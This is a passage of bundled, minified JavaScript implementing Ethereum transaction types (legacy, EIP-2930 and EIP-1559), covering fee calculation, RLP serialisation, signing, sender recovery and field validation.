                        const e = this.common.param("gasPrices", "tx");
                        let t = this.getDataFee();
                        if (e && (t += e), this.common.gteHardfork("homestead") && this.toCreationAddress()) {
                            const e = this.common.param("gasPrices", "txCreation");
                            e && (t += e);
                        }
                        return t;
                    }
                    getDataFee() {
                        const e = this.common.param("gasPrices", "txDataZero"), t = this.common.param("gasPrices", "txDataNonZero");
                        let r = BigInt(0);
                        for(let n = 0; n < this.data.length; n += 1)0 === this.data[n] ? r += e : r += t;
                        if ((void 0 === this.to || null === this.to) && this.common.isActivatedEIP(3860)) {
                            const e = BigInt(Math.ceil(this.data.length / 32));
                            r += this.common.param("gasPrices", "initCodeWordCost") * e;
                        }
                        return r;
                    }
                    toCreationAddress() {
                        return void 0 === this.to || 0 === this.to.buf.length;
                    }
                    isSigned() {
                        const { v: e, r: t, s: r } = this;
                        return void 0 !== e && void 0 !== t && void 0 !== r;
                    }
                    verifySignature() {
                        try {
                            const e = this.getSenderPublicKey();
                            return 0 !== (0, o.unpadUint8Array)(e).length;
                        } catch (e) {
                            return !1;
                        }
                    }
                    getSenderAddress() {
                        return new a.Address(a.Address.publicToAddress(this.getSenderPublicKey()));
                    }
                    sign(e) {
                        if (32 !== e.length) {
                            const e = this._errorMsg("Private key must be 32 bytes in length.");
                            throw new Error(e);
                        }
                        let t = !1;
                        0 === this.type && this.common.gteHardfork("spuriousDragon") && !this.supports(s.Capability.EIP155ReplayProtection) && (this.activeCapabilities.push(s.Capability.EIP155ReplayProtection), t = !0);
                        const r = this.getMessageToSign(!0), { v: n, r: i, s: o } = this._ecsign(r, e), a = this._processSignature(n, i, o);
                        if (t) {
                            const e = this.activeCapabilities.indexOf(s.Capability.EIP155ReplayProtection);
                            e > -1 && this.activeCapabilities.splice(e, 1);
                        }
                        return a;
                    }
                    _getCommon(e, t) {
                        var r;
                        if (void 0 !== t) {
                            const r = (0, o.uint8ArrayToBigInt)((0, o.toUint8Array)(t));
                            if (e) {
                                if (e.chainId() !== r) {
                                    const e = this._errorMsg("The chain ID does not match the chain ID of Common");
                                    throw new Error(e);
                                }
                                return e.copy();
                            }
                            return o.Common.isSupportedChainId(r) ? new o.Common({
                                chain: r,
                                hardfork: this.DEFAULT_HARDFORK
                            }) : o.Common.custom({
                                name: "custom-chain",
                                networkId: r,
                                chainId: r
                            }, {
                                baseChain: this.DEFAULT_CHAIN,
                                hardfork: this.DEFAULT_HARDFORK
                            });
                        }
                        return null !== (r = null == e ? void 0 : e.copy()) && void 0 !== r ? r : new o.Common({
                            chain: this.DEFAULT_CHAIN,
                            hardfork: this.DEFAULT_HARDFORK
                        });
                    }
                    _validateCannotExceedMaxInteger(e, t = 256, r = !1) {
                        for (const [n, o] of Object.entries(e))switch(t){
                            case 64:
                                if (r) {
                                    if (void 0 !== o && o >= i.MAX_UINT64) {
                                        const e = this._errorMsg(`${n} cannot equal or exceed MAX_UINT64 (2^64-1), given ${o}`);
                                        throw new Error(e);
                                    }
                                } else if (void 0 !== o && o > i.MAX_UINT64) {
                                    const e = this._errorMsg(`${n} cannot exceed MAX_UINT64 (2^64-1), given ${o}`);
                                    throw new Error(e);
                                }
                                break;
                            case 256:
                                if (r) {
                                    if (void 0 !== o && o >= i.MAX_INTEGER) {
                                        const e = this._errorMsg(`${n} cannot equal or exceed MAX_INTEGER (2^256-1), given ${o}`);
                                        throw new Error(e);
                                    }
                                } else if (void 0 !== o && o > i.MAX_INTEGER) {
                                    const e = this._errorMsg(`${n} cannot exceed MAX_INTEGER (2^256-1), given ${o}`);
                                    throw new Error(e);
                                }
                                break;
                            default:
                                {
                                    const e = this._errorMsg("unimplemented bits value");
                                    throw new Error(e);
                                }
                        }
                    }
                    static _validateNotArray(e) {
                        const t = [
                            "nonce",
                            "gasPrice",
                            "gasLimit",
                            "to",
                            "value",
                            "data",
                            "v",
                            "r",
                            "s",
                            "type",
                            "baseFee",
                            "maxFeePerGas",
                            "chainId"
                        ];
                        for (const [r, n] of Object.entries(e))if (t.includes(r) && Array.isArray(n)) throw new Error(`${r} cannot be an array`);
                    }
                    _getSharedErrorPostfix() {
                        let e = "";
                        try {
                            e = this.isSigned() ? (0, n.bytesToHex)(this.hash()) : "not available (unsigned)";
                        } catch (t) {
                            e = "error";
                        }
                        let t = "";
                        try {
                            t = this.isSigned().toString();
                        } catch (t) {
                            e = "error";
                        }
                        let r = "";
                        try {
                            r = this.common.hardfork();
                        } catch (e) {
                            r = "error";
                        }
                        let i = `tx type=${this.type} hash=${e} nonce=${this.nonce} value=${this.value} `;
                        return i += `signed=${t} hf=${r}`, i;
                    }
                    _ecsign(e, t, r) {
                        const n = i.secp256k1.sign(e, t), o = n.toCompactRawBytes();
                        return {
                            r: o.subarray(0, 32),
                            s: o.subarray(32, 64),
                            v: void 0 === r ? BigInt(n.recovery + 27) : BigInt(n.recovery + 35) + BigInt(r) * BigInt(2)
                        };
                    }
                };
            },
            4555: function(e, t, r) {
                "use strict";
                var n, i = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), o = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), s = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && i(t, e, r);
                    return o(t, e), t;
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.SECP256K1_ORDER_DIV_2 = t.SECP256K1_ORDER = t.MAX_INTEGER = t.MAX_UINT64 = t.secp256k1 = void 0;
                const a = s(r(5473));
                t.secp256k1 = null !== (n = a.secp256k1) && void 0 !== n ? n : a, t.MAX_UINT64 = BigInt("0xffffffffffffffff"), t.MAX_INTEGER = BigInt("0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"), t.SECP256K1_ORDER = t.secp256k1.CURVE.n, t.SECP256K1_ORDER_DIV_2 = t.SECP256K1_ORDER / BigInt(2);
            },
            6135: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.FeeMarketEIP1559Transaction = void 0;
                const n = r(7423), i = r(7345), o = r(7256), s = r(9634), a = r(4555), u = r(915), c = r(4562), l = r(2290), d = (0, s.hexToBytes)(2..toString(16).padStart(2, "0"));
                class h extends u.BaseTransaction {
                    constructor(e, t = {}){
                        var r;
                        super(Object.assign(Object.assign({}, e), {
                            type: 2
                        }), t), this.DEFAULT_HARDFORK = "london";
                        const { chainId: n, accessList: i, maxFeePerGas: o, maxPriorityFeePerGas: s } = e;
                        if (this.common = this._getCommon(t.common, n), this.chainId = this.common.chainId(), !this.common.isActivatedEIP(1559)) throw new Error("EIP-1559 not enabled on Common");
                        this.activeCapabilities = this.activeCapabilities.concat([
                            1559,
                            2718,
                            2930
                        ]);
                        const d = (0, c.getAccessListData)(null != i ? i : []);
                        if (this.accessList = d.accessList, this.AccessListJSON = d.AccessListJSON, (0, c.verifyAccessList)(this.accessList), this.maxFeePerGas = (0, l.uint8ArrayToBigInt)((0, l.toUint8Array)("" === o ? "0x" : o)), this.maxPriorityFeePerGas = (0, l.uint8ArrayToBigInt)((0, l.toUint8Array)("" === s ? "0x" : s)), this._validateCannotExceedMaxInteger({
                            maxFeePerGas: this.maxFeePerGas,
                            maxPriorityFeePerGas: this.maxPriorityFeePerGas
                        }), u.BaseTransaction._validateNotArray(e), this.gasLimit * this.maxFeePerGas > a.MAX_INTEGER) {
                            const e = this._errorMsg("gasLimit * maxFeePerGas cannot exceed MAX_INTEGER (2^256-1)");
                            throw new Error(e);
                        }
                        if (this.maxFeePerGas < this.maxPriorityFeePerGas) {
                            const e = this._errorMsg("maxFeePerGas cannot be less than maxPriorityFeePerGas (The total must be the larger of the two)");
                            throw new Error(e);
                        }
                        this._validateYParity(), this._validateHighS(), (null === (r = null == t ? void 0 : t.freeze) || void 0 === r || r) && Object.freeze(this);
                    }
                    static fromTxData(e, t = {}) {
                        return new h(e, t);
                    }
                    static fromSerializedTx(e, t = {}) {
                        if (!(0, s.uint8ArrayEquals)(e.subarray(0, 1), d)) throw new Error(`Invalid serialized tx input: not an EIP-1559 transaction (wrong tx type, expected: 2, received: ${(0, s.bytesToHex)(e.subarray(0, 1))}`);
                        const r = o.RLP.decode(e.subarray(1));
                        if (!Array.isArray(r)) throw new Error("Invalid serialized tx input: must be array");
                        return h.fromValuesArray(r, t);
                    }
                    static fromValuesArray(e, t = {}) {
                        if (9 !== e.length && 12 !== e.length) throw new Error("Invalid EIP-1559 transaction. Only expecting 9 values (for unsigned tx) or 12 values (for signed tx).");
                        const [r, n, o, s, a, u, c, d, f, p, m, g] = e;
                        return this._validateNotArray({
                            chainId: r,
                            v: p
                        }), (0, i.validateNoLeadingZeroes)({
                            nonce: n,
                            maxPriorityFeePerGas: o,
                            maxFeePerGas: s,
                            gasLimit: a,
                            value: c,
                            v: p,
                            r: m,
                            s: g
                        }), new h({
                            chainId: (0, l.uint8ArrayToBigInt)(r),
                            nonce: n,
                            maxPriorityFeePerGas: o,
                            maxFeePerGas: s,
                            gasLimit: a,
                            to: u,
                            value: c,
                            data: d,
                            accessList: null != f ? f : [],
                            v: void 0 !== p ? (0, l.uint8ArrayToBigInt)(p) : void 0,
                            r: m,
                            s: g
                        }, t);
                    }
                    getDataFee() {
                        if (this.cache.dataFee && this.cache.dataFee.hardfork === this.common.hardfork()) return this.cache.dataFee.value;
                        let e = super.getDataFee();
                        return e += BigInt((0, c.getDataFeeEIP2930)(this.accessList, this.common)), Object.isFrozen(this) && (this.cache.dataFee = {
                            value: e,
                            hardfork: this.common.hardfork()
                        }), e;
                    }
                    getUpfrontCost(e = BigInt(0)) {
                        const t = this.maxPriorityFeePerGas, r = this.maxFeePerGas - e, n = (t < r ? t : r) + e;
                        return this.gasLimit * n + this.value;
                    }
                    raw() {
                        return [
                            (0, l.bigIntToUnpaddedUint8Array)(this.chainId),
                            (0, l.bigIntToUnpaddedUint8Array)(this.nonce),
                            (0, l.bigIntToUnpaddedUint8Array)(this.maxPriorityFeePerGas),
                            (0, l.bigIntToUnpaddedUint8Array)(this.maxFeePerGas),
                            (0, l.bigIntToUnpaddedUint8Array)(this.gasLimit),
                            void 0 !== this.to ? this.to.buf : Uint8Array.from([]),
                            (0, l.bigIntToUnpaddedUint8Array)(this.value),
                            this.data,
                            this.accessList,
                            void 0 !== this.v ? (0, l.bigIntToUnpaddedUint8Array)(this.v) : Uint8Array.from([]),
                            void 0 !== this.r ? (0, l.bigIntToUnpaddedUint8Array)(this.r) : Uint8Array.from([]),
                            void 0 !== this.s ? (0, l.bigIntToUnpaddedUint8Array)(this.s) : Uint8Array.from([])
                        ];
                    }
                    serialize() {
                        const e = this.raw();
                        return (0, s.uint8ArrayConcat)(d, o.RLP.encode(e));
                    }
                    getMessageToSign(e = !0) {
                        const t = this.raw().slice(0, 9), r = (0, s.uint8ArrayConcat)(d, o.RLP.encode(t));
                        return e ? (0, n.keccak256)(r) : r;
                    }
                    hash() {
                        if (!this.isSigned()) {
                            const e = this._errorMsg("Cannot call hash method if transaction is not signed");
                            throw new Error(e);
                        }
                        return Object.isFrozen(this) ? (this.cache.hash || (this.cache.hash = (0, n.keccak256)(this.serialize())), this.cache.hash) : (0, n.keccak256)(this.serialize());
                    }
                    getMessageToVerifySignature() {
                        return this.getMessageToSign();
                    }
                    getSenderPublicKey() {
                        if (!this.isSigned()) {
                            const e = this._errorMsg("Cannot call this method if transaction is not signed");
                            throw new Error(e);
                        }
                        const e = this.getMessageToVerifySignature(), { v: t, r: r, s: n } = this;
                        this._validateHighS();
                        try {
                            return (0, l.ecrecover)(e, t + BigInt(27), (0, l.bigIntToUnpaddedUint8Array)(r), (0, l.bigIntToUnpaddedUint8Array)(n));
                        } catch (e) {
                            const t = this._errorMsg("Invalid Signature");
                            throw new Error(t);
                        }
                    }
                    _processSignature(e, t, r) {
                        const n = Object.assign(Object.assign({}, this.txOptions), {
                            common: this.common
                        });
                        return h.fromTxData({
                            chainId: this.chainId,
                            nonce: this.nonce,
                            maxPriorityFeePerGas: this.maxPriorityFeePerGas,
                            maxFeePerGas: this.maxFeePerGas,
                            gasLimit: this.gasLimit,
                            to: this.to,
                            value: this.value,
                            data: this.data,
                            accessList: this.accessList,
                            v: e - BigInt(27),
                            r: (0, l.uint8ArrayToBigInt)(t),
                            s: (0, l.uint8ArrayToBigInt)(r)
                        }, n);
                    }
                    toJSON() {
                        const e = (0, c.getAccessListJSON)(this.accessList);
                        return {
                            chainId: (0, l.bigIntToHex)(this.chainId),
                            nonce: (0, l.bigIntToHex)(this.nonce),
                            maxPriorityFeePerGas: (0, l.bigIntToHex)(this.maxPriorityFeePerGas),
                            maxFeePerGas: (0, l.bigIntToHex)(this.maxFeePerGas),
                            gasLimit: (0, l.bigIntToHex)(this.gasLimit),
                            to: void 0 !== this.to ? this.to.toString() : void 0,
                            value: (0, l.bigIntToHex)(this.value),
                            data: (0, s.bytesToHex)(this.data),
                            accessList: e,
                            v: void 0 !== this.v ? (0, l.bigIntToHex)(this.v) : void 0,
                            r: void 0 !== this.r ? (0, l.bigIntToHex)(this.r) : void 0,
                            s: void 0 !== this.s ? (0, l.bigIntToHex)(this.s) : void 0
                        };
                    }
                    errorStr() {
                        let e = this._getSharedErrorPostfix();
                        return e += ` maxFeePerGas=${this.maxFeePerGas} maxPriorityFeePerGas=${this.maxPriorityFeePerGas}`, e;
                    }
                    _errorMsg(e) {
                        return `${e} (${this.errorStr()})`;
                    }
                }
                t.FeeMarketEIP1559Transaction = h;
            },
            9013: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.AccessListEIP2930Transaction = void 0;
                const n = r(7423), i = r(7345), o = r(7256), s = r(9634), a = r(4555), u = r(4562), c = r(2290), l = r(915), d = (0, s.hexToBytes)(1..toString(16).padStart(2, "0"));
                class h extends l.BaseTransaction {
                    constructor(e, t = {}){
                        var r;
                        super(Object.assign(Object.assign({}, e), {
                            type: 1
                        }), t), this.DEFAULT_HARDFORK = "berlin";
                        const { chainId: n, accessList: i, gasPrice: o } = e;
                        if (this.common = this._getCommon(t.common, n), this.chainId = this.common.chainId(), !this.common.isActivatedEIP(2930)) throw new Error("EIP-2930 not enabled on Common");
                        this.activeCapabilities = this.activeCapabilities.concat([
                            2718,
                            2930
                        ]);
                        const s = (0, u.getAccessListData)(null != i ? i : []);
                        if (this.accessList = s.accessList, this.AccessListJSON = s.AccessListJSON, (0, u.verifyAccessList)(this.accessList), this.gasPrice = (0, c.uint8ArrayToBigInt)((0, c.toUint8Array)("" === o ? "0x" : o)), this._validateCannotExceedMaxInteger({
                            gasPrice: this.gasPrice
                        }), l.BaseTransaction._validateNotArray(e), this.gasPrice * this.gasLimit > a.MAX_INTEGER) {
                            const e = this._errorMsg("gasLimit * gasPrice cannot exceed MAX_INTEGER");
                            throw new Error(e);
                        }
                        this._validateYParity(), this._validateHighS(), (null === (r = null == t ? void 0 : t.freeze) || void 0 === r || r) && Object.freeze(this);
                    }
                    static fromTxData(e, t = {}) {
                        return new h(e, t);
                    }
                    static fromSerializedTx(e, t = {}) {
                        if (!(0, s.uint8ArrayEquals)(e.subarray(0, 1), d)) throw new Error(`Invalid serialized tx input: not an EIP-2930 transaction (wrong tx type, expected: 1, received: ${(0, s.bytesToHex)(e.subarray(0, 1))}`);
                        const r = o.RLP.decode(Uint8Array.from(e.subarray(1)));
                        if (!Array.isArray(r)) throw new Error("Invalid serialized tx input: must be array");
                        return h.fromValuesArray(r, t);
                    }
                    static fromValuesArray(e, t = {}) {
                        if (8 !== e.length && 11 !== e.length) throw new Error("Invalid EIP-2930 transaction. Only expecting 8 values (for unsigned tx) or 11 values (for signed tx).");
                        const [r, n, o, s, a, u, l, d, f, p, m] = e;
                        return this._validateNotArray({
                            chainId: r,
                            v: f
                        }), (0, i.validateNoLeadingZeroes)({
                            nonce: n,
                            gasPrice: o,
                            gasLimit: s,
                            value: u,
                            v: f,
                            r: p,
                            s: m
                        }), new h({
                            chainId: (0, c.uint8ArrayToBigInt)(r),
                            nonce: n,
                            gasPrice: o,
                            gasLimit: s,
                            to: a,
                            value: u,
                            data: l,
                            accessList: null != d ? d : [],
                            v: void 0 !== f ? (0, c.uint8ArrayToBigInt)(f) : void 0,
                            r: p,
                            s: m
                        }, t);
                    }
                    getDataFee() {
                        if (this.cache.dataFee && this.cache.dataFee.hardfork === this.common.hardfork()) return this.cache.dataFee.value;
                        let e = super.getDataFee();
                        return e += BigInt((0, u.getDataFeeEIP2930)(this.accessList, this.common)), Object.isFrozen(this) && (this.cache.dataFee = {
                            value: e,
                            hardfork: this.common.hardfork()
                        }), e;
                    }
                    getUpfrontCost() {
                        return this.gasLimit * this.gasPrice + this.value;
                    }
                    raw() {
                        return [
                            (0, c.bigIntToUnpaddedUint8Array)(this.chainId),
                            (0, c.bigIntToUnpaddedUint8Array)(this.nonce),
                            (0, c.bigIntToUnpaddedUint8Array)(this.gasPrice),
                            (0, c.bigIntToUnpaddedUint8Array)(this.gasLimit),
                            void 0 !== this.to ? this.to.buf : Uint8Array.from([]),
                            (0, c.bigIntToUnpaddedUint8Array)(this.value),
                            this.data,
                            this.accessList,
                            void 0 !== this.v ? (0, c.bigIntToUnpaddedUint8Array)(this.v) : Uint8Array.from([]),
                            void 0 !== this.r ? (0, c.bigIntToUnpaddedUint8Array)(this.r) : Uint8Array.from([]),
                            void 0 !== this.s ? (0, c.bigIntToUnpaddedUint8Array)(this.s) : Uint8Array.from([])
                        ];
                    }
                    serialize() {
                        const e = this.raw();
                        return (0, s.uint8ArrayConcat)(d, o.RLP.encode(e));
                    }
                    getMessageToSign(e = !0) {
                        const t = this.raw().slice(0, 8), r = (0, s.uint8ArrayConcat)(d, o.RLP.encode(t));
                        return e ? (0, n.keccak256)(r) : r;
                    }
                    hash() {
                        if (!this.isSigned()) {
                            const e = this._errorMsg("Cannot call hash method if transaction is not signed");
                            throw new Error(e);
                        }
                        return Object.isFrozen(this) ? (this.cache.hash || (this.cache.hash = (0, n.keccak256)(this.serialize())), this.cache.hash) : (0, n.keccak256)(this.serialize());
                    }
                    getMessageToVerifySignature() {
                        return this.getMessageToSign();
                    }
                    getSenderPublicKey() {
                        if (!this.isSigned()) {
                            const e = this._errorMsg("Cannot call this method if transaction is not signed");
                            throw new Error(e);
                        }
                        const e = this.getMessageToVerifySignature(), { v: t, r: r, s: n } = this;
                        this._validateHighS();
                        try {
                            return (0, c.ecrecover)(e, t + BigInt(27), (0, c.bigIntToUnpaddedUint8Array)(r), (0, c.bigIntToUnpaddedUint8Array)(n));
                        } catch (e) {
                            const t = this._errorMsg("Invalid Signature");
                            throw new Error(t);
                        }
                    }
                    _processSignature(e, t, r) {
                        const n = Object.assign(Object.assign({}, this.txOptions), {
                            common: this.common
                        });
                        return h.fromTxData({
                            chainId: this.chainId,
                            nonce: this.nonce,
                            gasPrice: this.gasPrice,
                            gasLimit: this.gasLimit,
                            to: this.to,
                            value: this.value,
                            data: this.data,
                            accessList: this.accessList,
                            v: e - BigInt(27),
                            r: (0, c.uint8ArrayToBigInt)(t),
                            s: (0, c.uint8ArrayToBigInt)(r)
                        }, n);
                    }
                    toJSON() {
                        const e = (0, u.getAccessListJSON)(this.accessList);
                        return {
                            chainId: (0, c.bigIntToHex)(this.chainId),
                            nonce: (0, c.bigIntToHex)(this.nonce),
                            gasPrice: (0, c.bigIntToHex)(this.gasPrice),
                            gasLimit: (0, c.bigIntToHex)(this.gasLimit),
                            to: void 0 !== this.to ? this.to.toString() : void 0,
                            value: (0, c.bigIntToHex)(this.value),
                            data: (0, s.bytesToHex)(this.data),
                            accessList: e,
                            v: void 0 !== this.v ? (0, c.bigIntToHex)(this.v) : void 0,
                            r: void 0 !== this.r ? (0, c.bigIntToHex)(this.r) : void 0,
                            s: void 0 !== this.s ? (0, c.bigIntToHex)(this.s) : void 0
                        };
                    }
                    errorStr() {
                        var e, t;
                        let r = this._getSharedErrorPostfix();
                        return r += ` gasPrice=${this.gasPrice} accessListCount=${null !== (t = null === (e = this.accessList) || void 0 === e ? void 0 : e.length) && void 0 !== t ? t : 0}`, r;
                    }
                    _errorMsg(e) {
                        return `${e} (${this.errorStr()})`;
                    }
                }
                t.AccessListEIP2930Transaction = h;
            },
            9275: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.TransactionFactory = t.Transaction = t.AccessListEIP2930Transaction = t.FeeMarketEIP1559Transaction = void 0;
                var o = r(6135);
                Object.defineProperty(t, "FeeMarketEIP1559Transaction", {
                    enumerable: !0,
                    get: function() {
                        return o.FeeMarketEIP1559Transaction;
                    }
                });
                var s = r(9013);
                Object.defineProperty(t, "AccessListEIP2930Transaction", {
                    enumerable: !0,
                    get: function() {
                        return s.AccessListEIP2930Transaction;
                    }
                });
                var a = r(5381);
                Object.defineProperty(t, "Transaction", {
                    enumerable: !0,
                    get: function() {
                        return a.Transaction;
                    }
                });
                var u = r(7668);
                Object.defineProperty(t, "TransactionFactory", {
                    enumerable: !0,
                    get: function() {
                        return u.TransactionFactory;
                    }
                }), i(r(9964), t);
            },
            5381: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Transaction = void 0;
                const n = r(7256), i = r(7423), o = r(9634), s = r(7345), a = r(2290), u = r(4555), c = r(915), l = r(9964);
                function d(e, t) {
                    const r = Number(e), n = 2 * Number(t);
                    return r === n + 35 || r === n + 36;
                }
                class h extends c.BaseTransaction {
                    constructor(e, t = {}){
                        var r;
                        if (super(Object.assign(Object.assign({}, e), {
                            type: 0
                        }), t), this.common = this._validateTxV(this.v, t.common), this.gasPrice = (0, a.uint8ArrayToBigInt)((0, a.toUint8Array)("" === e.gasPrice ? "0x" : e.gasPrice)), this.gasPrice * this.gasLimit > u.MAX_INTEGER) {
                            const e = this._errorMsg("gas limit * gasPrice cannot exceed MAX_INTEGER (2^256-1)");
                            throw new Error(e);
                        }
                        this._validateCannotExceedMaxInteger({
                            gasPrice: this.gasPrice
                        }), c.BaseTransaction._validateNotArray(e), this.common.gteHardfork("spuriousDragon") && (this.isSigned() ? d(this.v, this.common.chainId()) && this.activeCapabilities.push(l.Capability.EIP155ReplayProtection) : this.activeCapabilities.push(l.Capability.EIP155ReplayProtection)), (null === (r = null == t ? void 0 : t.freeze) || void 0 === r || r) && Object.freeze(this);
                    }
                    static fromTxData(e, t = {}) {
                        return new h(e, t);
                    }
                    static fromSerializedTx(e, t = {}) {
                        const r = n.RLP.decode(e);
                        if (!Array.isArray(r)) throw new Error("Invalid serialized tx input. Must be array");
                        return this.fromValuesArray(r, t);
                    }
                    static fromValuesArray(e, t = {}) {
                        if (6 !== e.length && 9 !== e.length) throw new Error("Invalid transaction. Only expecting 6 values (for unsigned tx) or 9 values (for signed tx).");
                        const [r, n, i, o, a, u, c, l, d] = e;
                        return (0, s.validateNoLeadingZeroes)({
                            nonce: r,
                            gasPrice: n,
                            gasLimit: i,
                            value: a,
                            v: c,
                            r: l,
                            s: d
                        }), new h({
                            nonce: r,
                            gasPrice: n,
                            gasLimit: i,
                            to: o,
                            value: a,
                            data: u,
                            v: c,
                            r: l,
                            s: d
                        }, t);
                    }
                    raw() {
                        return [
                            (0, a.bigIntToUnpaddedUint8Array)(this.nonce),
                            (0, a.bigIntToUnpaddedUint8Array)(this.gasPrice),
                            (0, a.bigIntToUnpaddedUint8Array)(this.gasLimit),
                            void 0 !== this.to ? this.to.buf : Uint8Array.from([]),
                            (0, a.bigIntToUnpaddedUint8Array)(this.value),
                            this.data,
                            void 0 !== this.v ? (0, a.bigIntToUnpaddedUint8Array)(this.v) : Uint8Array.from([]),
                            void 0 !== this.r ? (0, a.bigIntToUnpaddedUint8Array)(this.r) : Uint8Array.from([]),
                            void 0 !== this.s ? (0, a.bigIntToUnpaddedUint8Array)(this.s) : Uint8Array.from([])
                        ];
                    }
                    serialize() {
                        return n.RLP.encode(this.raw());
                    }
                    _getMessageToSign() {
                        const e = [
                            (0, a.bigIntToUnpaddedUint8Array)(this.nonce),
                            (0, a.bigIntToUnpaddedUint8Array)(this.gasPrice),
                            (0, a.bigIntToUnpaddedUint8Array)(this.gasLimit),
                            void 0 !== this.to ? this.to.buf : Uint8Array.from([]),
                            (0, a.bigIntToUnpaddedUint8Array)(this.value),
                            this.data
                        ];
                        return this.supports(l.Capability.EIP155ReplayProtection) && (e.push((0, a.toUint8Array)(this.common.chainId())), e.push((0, a.unpadUint8Array)((0, a.toUint8Array)(0))), e.push((0, a.unpadUint8Array)((0, a.toUint8Array)(0)))), e;
                    }
                    getMessageToSign(e = !0) {
                        const t = this._getMessageToSign();
                        return e ? (0, i.keccak256)(n.RLP.encode(t)) : t;
                    }
                    getDataFee() {
                        return this.cache.dataFee && this.cache.dataFee.hardfork === this.common.hardfork() ? this.cache.dataFee.value : (Object.isFrozen(this) && (this.cache.dataFee = {
                            value: super.getDataFee(),
                            hardfork: this.common.hardfork()
                        }), super.getDataFee());
                    }
                    getUpfrontCost() {
                        return this.gasLimit * this.gasPrice + this.value;
                    }
                    hash() {
                        if (!this.isSigned()) {
                            const e = this._errorMsg("Cannot call hash method if transaction is not signed");
                            throw new Error(e);
                        }
                        return Object.isFrozen(this) ? (this.cache.hash || (this.cache.hash = (0, i.keccak256)(n.RLP.encode(this.raw()))), this.cache.hash) : (0, i.keccak256)(n.RLP.encode(this.raw()));
                    }
                    getMessageToVerifySignature() {
                        if (!this.isSigned()) {
                            const e = this._errorMsg("This transaction is not signed");
                            throw new Error(e);
                        }
                        const e = this._getMessageToSign();
                        return (0, i.keccak256)(n.RLP.encode(e));
                    }
                    getSenderPublicKey() {
                        const e = this.getMessageToVerifySignature(), { v: t, r: r, s: n } = this;
                        this._validateHighS();
                        try {
                            return (0, a.ecrecover)(e, t, (0, a.bigIntToUnpaddedUint8Array)(r), (0, a.bigIntToUnpaddedUint8Array)(n), this.supports(l.Capability.EIP155ReplayProtection) ? this.common.chainId() : void 0);
                        } catch (e) {
                            const t = this._errorMsg("Invalid Signature");
                            throw new Error(t);
                        }
                    }
                    _processSignature(e, t, r) {
                        let n = e;
                        this.supports(l.Capability.EIP155ReplayProtection) && (n += this.common.chainId() * BigInt(2) + BigInt(8));
                        const i = Object.assign(Object.assign({}, this.txOptions), {
                            common: this.common
                        });
                        return h.fromTxData({
                            nonce: this.nonce,
                            gasPrice: this.gasPrice,
                            gasLimit: this.gasLimit,
                            to: this.to,
                            value: this.value,
                            data: this.data,
                            v: n,
                            r: (0, a.uint8ArrayToBigInt)(t),
                            s: (0, a.uint8ArrayToBigInt)(r)
                        }, i);
                    }
                    toJSON() {
                        return {
                            nonce: (0, a.bigIntToHex)(this.nonce),
                            gasPrice: (0, a.bigIntToHex)(this.gasPrice),
                            gasLimit: (0, a.bigIntToHex)(this.gasLimit),
                            to: void 0 !== this.to ? this.to.toString() : void 0,
                            value: (0, a.bigIntToHex)(this.value),
                            data: (0, o.bytesToHex)(this.data),
                            v: void 0 !== this.v ? (0, a.bigIntToHex)(this.v) : void 0,
                            r: void 0 !== this.r ? (0, a.bigIntToHex)(this.r) : void 0,
                            s: void 0 !== this.s ? (0, a.bigIntToHex)(this.s) : void 0
                        };
                    }
                    _validateTxV(e, t) {
                        let r;
                        const n = void 0 !== e ? Number(e) : void 0;
                        if (void 0 !== n && n < 37 && 27 !== n && 28 !== n) throw new Error(`Legacy txs need either v = 27/28 or v >= 37 (EIP-155 replay protection), got v = ${n}`);
                        if (void 0 !== n && 0 !== n && (!t || t.gteHardfork("spuriousDragon")) && 27 !== n && 28 !== n) {
                            if (t) {
                                if (!d(BigInt(n), t.chainId())) throw new Error(`Incompatible EIP155-based V ${n} and chain id ${t.chainId()}. See the Common parameter of the Transaction constructor to set the chain id.`);
                            } else {
                                let e;
                                e = (n - 35) % 2 == 0 ? 35 : 36, r = BigInt(n - e) / BigInt(2);
                            }
                        }
                        return this._getCommon(t, r);
                    }
                    errorStr() {
                        let e = this._getSharedErrorPostfix();
                        return e += ` gasPrice=${this.gasPrice}`, e;
                    }
                    _errorMsg(e) {
                        return `${e} (${this.errorStr()})`;
                    }
                }
                t.Transaction = h;
            },
            7668: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.TransactionFactory = void 0;
                const n = r(2290), i = r(6135), o = r(9013), s = r(5381);
                t.TransactionFactory = class {
                    constructor(){}
                    static fromTxData(e, t = {}) {
                        if (!("type" in e) || void 0 === e.type) return s.Transaction.fromTxData(e, t);
                        const r = Number((0, n.uint8ArrayToBigInt)((0, n.toUint8Array)(e.type)));
                        if (0 === r) return s.Transaction.fromTxData(e, t);
